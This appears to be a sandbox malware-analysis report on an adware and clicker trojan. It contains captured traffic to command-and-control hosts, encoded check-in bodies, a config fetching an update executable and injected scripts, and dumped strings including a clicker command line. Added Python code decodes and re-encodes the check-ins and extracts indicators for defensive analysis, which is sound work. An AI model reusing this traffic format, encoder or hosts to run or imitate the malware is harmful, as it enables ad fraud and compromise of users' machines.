Connection: keep-alive
X-CCC: SE
X-CID: 2
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: yfCcznapsU2gXoc6.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 61702
Date: Wed, 11 May 2016 21:17:24 GMT
Connection: keep-alive
Set-Cookie: MS-CV=yfCcznapsU2gXoc6.1; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/
Set-Cookie: MS-CV=yfCcznapsU2gXoc6.2; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk-ua" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js">.. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><title>Microsoft..... ................ .............. ................</title><meta name="Title" content="Microsoft..... ................ .............. ................" /><meta name="CorrelationVector" content="yfCcznapsU2gXoc6.1" /><meta name="Description" content="......
<<< skipped >>>
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 178.33.69.66
Content-Length: 252
Cache-Control: no-cache
eDFG25RpA4HXUB9aA57v4Jf/LX4Yb X7Qjgzl5gDgWnn5dEeL6hz0k8hvVjRbkndxMyI2gxoKDsZgIA1536p4VJzxMwfr8r30dsyCJ6GYNQrJi/UQIsgcaHwbPLw62bJUkpk9smhN3IyYxe3l8/2qhz1/hkGKemUVUm7BqNbsuicwahjd32U5Vd2O2bGOxJIgACIRUyFy YZjDSNgdjn4gIGoEwvz9vpM4v5qL Qz6gccxjE3NTrREHtYzU=
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 208
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /upload.php was not found on this server.</p>
</body></html>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 69.87.192.155
Content-Length: 408
Cache-Control: no-cache
dm0QjMM9U8cXsnF7FTbIGOCM5CPbNHQkqyrw22LVodJJB x1xEj1RZr7FhA8rTDmdi1eNhFKDExvAzmqDFVi2KhiMmh mqHjdGMiPsBbysLNqjnHAHNrY2joVCbrKluaa RxkZCYmABbj0CAUy2E0NlQit1wUs1IMeoddssft8Stb8RvGHH8ZJhek1prBxKflsDQx33wWW8kBjovjfgpe9iUSZSKg2SA2M7xN6uRr47BHcdYho0H NT/KmXdMk3EDcqr2fsPDHss90EVJCtB00phL2ZzgKI9xrEXWNqG13xdhs91LhdFjR/5cVljSeHbJuyH5xJO6NlfmLc0jRPwbU3 nAxqYpFnYDdegD4a3R8Wp0DaW6OsbivXdnpLYeSUHtHsr8msTrxL zmZ3kOexHU=
HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2016 21:17:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26633
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBCQCDC=MELFGAMBCBPDKDIOKADFMLAF; path=/
Cache-control: private
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />..<title>......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......</title>..<meta name="keywords" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<meta name="description" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<link rel="stylesheet" type="text/css" href="http://69.87.192.155/css.asp?smbdjedjei">..<link href="hXXp://69.87.192.155/mb/26/images/css.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/51mybao.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/p-list.css" rel="stylesheet" type="text/css" />..<body>..<div class="top">..<div id="top_content">..<div id="top_left">..<a href="hXXp://69.87.192.155/smbdjedjei-37413/">dn180..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-37854/">f60..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-38295/">gh4145....</a>|..<a href="http://69.87.192.155/smbdjedjei-38736/">incoloy825....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39177/">inconel....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39618/">n10665..
<<< skipped >>>
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=yfCcznapsU2gXoc6.2
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Wed, 11 May 2016 21:17:26 GMT
Connection: keep-alive
MZ.. [PE executable response body; binary omitted. Visible in the data: DOS stub "This program cannot be run in DOS mode", sections .text, .data, .rsrc]
<<< skipped >>>
[unreadable binary request data; the server rejected it with 400 Bad Request]
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 11 May 2016 21:17:23 GMT
Connection: close
Content-Length: 35
<h1>Bad Request (Invalid Verb)</h1>
GET /browser.jsonp HTTP/1.1
Host: genisys.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 11 May 2016 21:16:48 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f421bdf8e89fa5b74fdc38460a791651463001408; expires=Thu, 11-May-17 21:16:48 GMT; path=/; domain=.genisys.online; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Set-Cookie: CAKEPHP=pe4o11m4je6kqalqh98umh3g63; expires=Thu, 12-May-2016 01:16:48 GMT; Max-Age=14400; path=/; HttpOnly
cfffi: UA
caching-disabled: 0
Server: cloudflare-nginx
CF-RAY: 2a18a77007c216c4-ARN
4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..
<<< skipped >>>
[unreadable binary request data; the server rejected it with 400 Bad Request]
HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 May 2016 21:17:29 GMT
Connection: close
Content-Length: 326
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Verb</h2>
<hr><p>HTTP Error 400. The request verb is invalid.</p>
</BODY></HTML>
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Length: 148
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>
POST hXXp://hen2.microaol.net/api HTTP/1.1
Content-Type: application/json
Content-Length: 216
Yzp6andva31qOiI6OjQ6e3B5dnZ9dDoiOnx9an17c21rOjQ6fW59dmw6Ijp/fWw6
NDpxfDoiLzQ6dHd7eXR9OiIpKCsrNDpoand8bXtsOiI6XmpxblR5bXZ7cH1qOjQ6
bW1xfDoiOmMqeiwqKnkgLCF9enwsLHwqIX55L30tIH18KXogIH4tfmU6NDpufWpr
cXd2OiI6KjYpOmU=
HTTP/1.1 302 Found
Location: hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip
Date: Wed, 11 May 2016 21:18:08 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
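The two POST bodies sent to hen2.microaol.net/api (the one answered with {"rc":0,...} earlier in the capture and the one answered with the 302 to the .zip just above) are 64-column-wrapped base64 of a JSON object XORed with a single byte. The key is not stated anywhere in this report; the added example below recovers it by brute force, using "the plaintext must parse as a JSON object" as the oracle, and then decodes both captured bodies. Captured base64 in sandbox reports often contains spaces where '+' characters were lost in extraction (several of the bodies above show this), so the normaliser puts them back before decoding. This is an added example, not code from the report or from the sample itself; the function and constant names are its own, and the key value 0x18 is what the brute force returns for these bodies, not a value taken from the binary.

```python
"""Decode the XOR+base64 JSON check-ins the sample POSTs to hen2.microaol.net/api."""
import base64
import json
from typing import Optional

# First request body from the capture (answered with {"rc":0,...}), copied
# verbatim including the two spaces the extraction substituted for '+'.
CAPTURED_START_BODY = (
    "Yzp7cHl2dn10OiI6fH1qfXtzbWs6NDp9bn12bDoiOmtseWpsOjQ6cXw6Ii80OnR3\n"
    "e3l0fToiKSgrKzQ6aGp3fG17bDoiOl5qcW5UeW12e3B9ajo0Om1tcXw6IjpjKnos\n"
    "Kip5ICwhfXp8LCx8KiF eS99LSB9fCl6ICB LX5lOjQ6bn1qa3F3djoiOio2KTpl"
)

# Second request body from the capture (answered with the 302 to the .zip).
CAPTURED_GET_BODY = (
    "Yzp6andva31qOiI6OjQ6e3B5dnZ9dDoiOnx9an17c21rOjQ6fW59dmw6Ijp/fWw6\n"
    "NDpxfDoiLzQ6dHd7eXR9OiIpKCsrNDpoand8bXtsOiI6XmpxblR5bXZ7cH1qOjQ6\n"
    "bW1xfDoiOmMqeiwqKnkgLCF9enwsLHwqIX55L30tIH18KXogIH4tfmU6NDpufWpr\n"
    "cXd2OiI6KjYpOmU="
)


def normalize_base64(body: str) -> bytes:
    """Undo the damage a pasted blob picks up: '+' turned into spaces,
    64-column line wrapping, and stripped '=' padding."""
    compact = body.replace(" ", "+")
    compact = "".join(compact.split())          # drop CR/LF wrapping
    compact += "=" * (-len(compact) % 4)        # restore padding if it was lost
    return base64.b64decode(compact)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_xor_key(raw: bytes) -> int:
    """Brute-force the single-byte key; the first key whose output parses as a
    JSON object wins. Raises ValueError if none does."""
    for key in range(256):
        try:
            obj = json.loads(xor_bytes(raw, key).decode("utf-8"))
        except (UnicodeDecodeError, ValueError):
            continue
        if isinstance(obj, dict):
            return key
    raise ValueError("no single-byte XOR key yields a JSON object")


def decode_api_body(body: str, key: Optional[int] = None) -> dict:
    """Base64 -> XOR -> JSON. With key=None the key is recovered from the body."""
    raw = normalize_base64(body)
    if key is None:
        key = recover_xor_key(raw)
    return json.loads(xor_bytes(raw, key).decode("utf-8"))


def encode_api_body(obj: dict, key: int) -> str:
    """Inverse transform (compact JSON, no wrapping), for replaying a check-in
    against a local mock of the API or diffing against a capture."""
    plain = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    return base64.b64encode(xor_bytes(plain, key)).decode("ascii")


if __name__ == "__main__":
    key = recover_xor_key(normalize_base64(CAPTURED_START_BODY))
    print(f"recovered key: 0x{key:02x}")
    for body in (CAPTURED_START_BODY, CAPTURED_GET_BODY):
        print(json.dumps(decode_api_body(body, key), indent=2))
```

Running it prints the recovered key and two check-in objects carrying the same product, channel, locale and machine uuid fields; the first has "event":"start" and the second "event":"get", the latter being the request the server answers with the 302 to the per-request .zip. The round-trip encoder reproduces the captured first body byte for byte once the spaces are restored to '+', which is a quick way to confirm the decoding is exact rather than merely plausible.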
GET /browser.jsonp HTTP/1.1
Host: genisys.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 11 May 2016 21:16:58 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d08ae627aef3d5d16e727a6ce4a8af1131463001418; expires=Thu, 11-May-17 21:16:58 GMT; path=/; domain=.genisys.online; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Set-Cookie: CAKEPHP=cblnu4h61fme4stsiu2p3ocbs2; expires=Thu, 12-May-2016 01:16:58 GMT; Max-Age=14400; path=/; HttpOnly
cfffi: UA
caching-disabled: 0
Server: cloudflare-nginx
CF-RAY: 2a18a7b0bde2370e-ARN
4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..
<<< skipped >>>
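The two /browser.jsonp responses from genisys.online above (one at 21:16:48, one at 21:16:58, identical content) are chunked-encoded JSONP: a hex chunk size (4bf), the SMInitCallback(...) payload, then the zero-length terminating chunk. The payload is the configuration for the browser component: an "Update" URL to a second executable, "customScripts" URLs to be injected over HTTP and HTTPS, and "triggerLinks" with a redirect template carrying keyword/subid/userid placeholders. The added example below, not code from the report or from the sample, strips the chunked framing, unwraps the callback and pulls those indicators out. The chunked wire form is constructed here from the captured payload (so its chunk size is computed, not the 4bf seen in the log), the payload keeps the report's "VVV." defanging, and line breaks were inserted in it only between JSON tokens.

```python
"""Parse the genisys.online /browser.jsonp response: de-chunk, unwrap JSONP, extract IOCs."""
import json
import re
from typing import Any, Dict, List, Tuple
from urllib.parse import urlsplit

# Callback payload as it appears in the capture above (defanged 'VVV.' kept,
# wrapped here only between JSON tokens so it stays valid).
CAPTURED_JSONP = r'''SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},
"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},
"banners":[],"htmlblock":[],
"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},
{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],
"blackList":[],
"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],
"triggerDomains":[],
"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},
"country":"UA"})'''


def make_chunked(payload: str) -> bytes:
    """Constructed wire form: one data chunk plus the terminating zero-length
    chunk, the same framing the capture shows with size 4bf."""
    data = payload.encode("utf-8")
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(data), data)


SAMPLE_RESPONSE_BODY = make_chunked(CAPTURED_JSONP)


def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked transfer-encoded body."""
    out, pos = bytearray(), 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += body[nl + 2:nl + 2 + size]
        pos = nl + 2 + size + 2                       # past the data and its CRLF


JSONP_RE = re.compile(r"^\s*([A-Za-z_$][\w$]*)\s*\((.*)\)\s*;?\s*$", re.S)


def unwrap_jsonp(text: str) -> Tuple[str, Any]:
    """Return (callback name, parsed JSON argument)."""
    m = JSONP_RE.match(text)
    if not m:
        raise ValueError("not a JSONP response")
    return m.group(1), json.loads(m.group(2))


def harvest_urls(node: Any, found: List[str]) -> List[str]:
    """Walk the config recursively and collect every string that is a URL."""
    if isinstance(node, dict):
        for value in node.values():
            harvest_urls(value, found)
    elif isinstance(node, list):
        for value in node:
            harvest_urls(value, found)
    elif isinstance(node, str) and re.match(r"[a-z][a-z0-9+.-]*://", node, re.I):
        found.append(node)
    return found


def extract_indicators(body: bytes) -> Dict[str, Any]:
    callback, cfg = unwrap_jsonp(dechunk(body).decode("utf-8"))
    return {
        "callback": callback,
        "tracking_id": cfg.get("Settings", {}).get("google_tracking_id"),
        "update_url": cfg.get("Update", {}).get("url"),
        "custom_scripts": [s["url"] for s in cfg.get("customScripts", [])],
        "trigger_redirects": {d: v["redirect"] for d, v in cfg.get("triggerLinks", {}).items()},
        "country": cfg.get("country"),
        "hosts": sorted({urlsplit(u).netloc for u in harvest_urls(cfg, [])}),
    }


if __name__ == "__main__":
    print(json.dumps(extract_indicators(SAMPLE_RESPONSE_BODY), indent=2))
```

The recursive URL walk is deliberately schema-agnostic: the named fields (Update, customScripts, triggerLinks) are what matters for this sample, but a later config version can add keys, and the host list should still catch every domain it references.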
Map
The Trojan connects to the servers at the following location(s):
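The location list is empty in this copy of the report, but the hosts can be recovered from the HTTP capture above. The added example below, not code from the report, splits a raw capture of this shape into request/response pairs and lists the hosts contacted. Two details that matter for this sample: the hen2.microaol.net requests carry no Host header at all, so the host has to be read from the absolute-form request target, and two of the servers are addressed by bare IP (178.33.69.66, 69.87.192.155), which is worth flagging on its own. The sample capture is constructed from four of the exchanges above, with bodies abridged to one line, CRLF line endings restored and the report's hXXp/VVV defanging kept.

```python
"""Summarize a raw HTTP capture: one record per exchange, plus the hosts contacted."""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed sample: four exchanges from the capture above, bodies abridged.
SAMPLE_CAPTURE = (
    "POST hXXp://hen2.microaol.net/api HTTP/1.1\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    "Yzp7cHl2dn10OiI6fH1qfXtzbWs6NDp9bn12bDoiOmtseWpsOjQ6cXw6Ii80OnR3\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"rc":0,"st":1463001487,"payroll":null}\r\n'
    "POST /upload.php HTTP/1.1\r\n"
    "Host: 178.33.69.66\r\n"
    "\r\n"
    "I21F3cM/AoSf lEcGrGqs1 vcKjRRcc2OgPH4txv0YZ 24G2khb6H6/e6RXwLDdAWJ4E\r\n"
    "HTTP/1.1 404 Not Found\r\n"
    "Server: nginx\r\n"
    "\r\n"
    "<html><body><h1>Not Found</h1></body></html>\r\n"
    "GET / HTTP/1.1\r\n"
    "Host: VVV.microsoft.com\r\n"
    "\r\n"
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Location: hXXp://VVV.microsoft.com/uk-ua/\r\n"
    "\r\n"
    "GET /browser.jsonp HTTP/1.1\r\n"
    "Host: genisys.online\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "\r\n"
    "SMInitCallback({})\r\n"
)

# A message starts at a request line or a status line.
MESSAGE_START = re.compile(
    r"^(?:(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]"
    r"|HTTP/1\.[01] (?P<status>\d{3})[^\r\n]*)\r?$",
    re.M,
)
# Base64 alphabet plus whitespace, since extraction turns '+' into spaces.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/=\s]{16,}$")


def split_messages(capture: str) -> List[dict]:
    """Cut at every request/status line; parse start line, headers and body."""
    starts = list(MESSAGE_START.finditer(capture))
    messages = []
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(capture)
        parts = re.split(r"\r?\n\r?\n", capture[m.start():end], maxsplit=1)
        headers: Dict[str, str] = {}
        for line in parts[0].splitlines()[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        messages.append({
            "method": m.group("method"),
            "target": m.group("target"),
            "status": int(m.group("status")) if m.group("status") else None,
            "headers": headers,
            "body": parts[1].strip() if len(parts) > 1 else "",
        })
    return messages


def request_host(req: dict) -> Optional[str]:
    """Host header if present, else the authority of an absolute-form target."""
    return req["headers"].get("host") or urlsplit(req["target"]).netloc or None


def _record(req: dict, resp: Optional[dict]) -> dict:
    host = request_host(req)
    try:
        host_is_ip = bool(host) and ipaddress.ip_address(host.split(":")[0]) is not None
    except ValueError:
        host_is_ip = False
    return {
        "method": req["method"],
        "host": host,
        "host_is_ip": host_is_ip,
        "path": urlsplit(req["target"]).path or req["target"],
        "body_looks_base64": bool(req["body"]) and BASE64ISH.match(req["body"]) is not None,
        "status": resp["status"] if resp else None,
        "response_headers": resp["headers"] if resp else {},
    }


def summarize_capture(capture: str) -> List[dict]:
    """Pair each request with the response that follows it in the capture."""
    exchanges, pending = [], None
    for msg in split_messages(capture):
        if msg["method"]:
            if pending is not None:
                exchanges.append(_record(pending, None))   # request with no reply
            pending = msg
        elif pending is not None:
            exchanges.append(_record(pending, msg))
            pending = None
    if pending is not None:
        exchanges.append(_record(pending, None))
    return exchanges


def contacted_hosts(capture: str) -> List[str]:
    return sorted({ex["host"] for ex in summarize_capture(capture) if ex["host"]})
```

Pairing by order is adequate for a single-stream sandbox capture; on a multi-connection pcap you would pair by TCP stream instead. The body_looks_base64 flag is only a hint to look closer (the /upload.php and 69.87.192.155 bodies above trip it too), not a classifier.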
Strings from Dumps
regsvr32.exe_2700_rwx_00080000_00132000:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
4,41494^4
6%6X6v6
6*636@6~6
>0>>>[>~>
6%6s6
67
7%7X7
3%4,41464
6-676H6l6v6}6
Uh.EE
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
c:\docume~1\"%CurrentUserName%"\locals~1\temp\nsq2.tmp\clicker\clicker.exe /s path>path inj_ffile>inj_ffile
regsvr32.exe_2700:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
